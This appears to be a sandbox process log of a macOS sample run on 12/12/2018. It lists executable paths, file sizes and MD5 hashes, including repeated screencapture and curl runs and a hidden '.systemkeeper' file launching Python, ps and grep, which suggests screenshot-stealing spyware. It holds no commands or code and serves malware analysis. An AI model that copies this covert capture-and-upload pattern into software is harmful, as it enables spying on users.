Start time:11:25:09
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:09
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:09
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:15
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:15
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:16
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:16
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:21
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:21
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:22
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:22
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:28
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:28
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:28
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:28
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:41
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:41
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:41
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:41
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:47
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:47
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:47
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:47
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:53
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:53
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:25:53
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:53
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:25:59
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:25:59
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:00
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:00
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:26:12
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:12
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:12
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:12
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:26:18
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:18
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:19
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:19
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:26:25
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:25
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:25
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:25
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:26:31
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:31
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:31
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:31
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/sbin/screencapture
File size:120496 bytes
MD5 hash:e35ea92c730c1c3a66fc3a14027729aa

General

Start time:11:26:37
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/bin/curl
File size:185104 bytes
MD5 hash:078cd73f58d3d8f875eed22522ff73f7

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/sbin/system_profiler
File size:45472 bytes
MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/sbin/system_profiler
File size:45472 bytes
MD5 hash:28bae8e36d2b8a65b50a54ee327298b8

General

Start time:11:24:40
Start date:12/12/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:11:24:40
Start date:12/12/2018
Path:/usr/bin/awk
File size:112592 bytes
MD5 hash:fa9db7f6c4a0287ceb78a3bd34524ada

General

Start time:11:24:42
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:24:42
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:24:42
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:44
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:24:44
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:44
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:24:52
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:24:52
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:24:52
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:52
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:52
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:24:52
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:24:52
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:25:03
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:25:03
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:03
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:03
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:03
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:13
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:25:13
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:25:13
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:13
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:13
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:13
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:13
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:23
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:25:23
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:25:23
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:24
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:24
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:24
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:24
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:25:34
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:25:34
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:34
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:34
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:34
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:45
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:25:45
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:25:45
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:45
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:45
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:45
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:45
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:55
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:25:55
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:25:55
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:55
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:55
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:25:55
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:25:55
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:26:06
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:26:06
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:06
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:06
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:06
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:16
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:26:16
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:26:16
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:16
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:16
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:16
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:16
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:27
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:26:27
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:26:27
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:27
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/ps
File size:51280 bytes
MD5 hash:792e18b1417ac1f184680d2423206e4f

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:27
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:27
Start date:12/12/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:11:26:27
Start date:12/12/2018
Path:/usr/bin/grep
File size:33936 bytes
MD5 hash:2b3efb273296881708ea2914c612e0eb

General

Start time:11:26:37
Start date:12/12/2018
Path:/usr/libexec/xpcproxy
File size:43488 bytes
MD5 hash:d1bb9a4899f0af921e8188218b20d744

General

Start time:11:26:37
Start date:12/12/2018
Path:/Users/henry/.system/.systemkeeper
File size:1195 bytes
MD5 hash:4d733d44288f4357c292938f0a18a7e9

General

Start time:11:26:37
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
MD5 hash:ba780ab677147d9db60c564ef3f51dd0

General

Start time:11:26:37
Start date:12/12/2018
Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
File size:51744 bytes
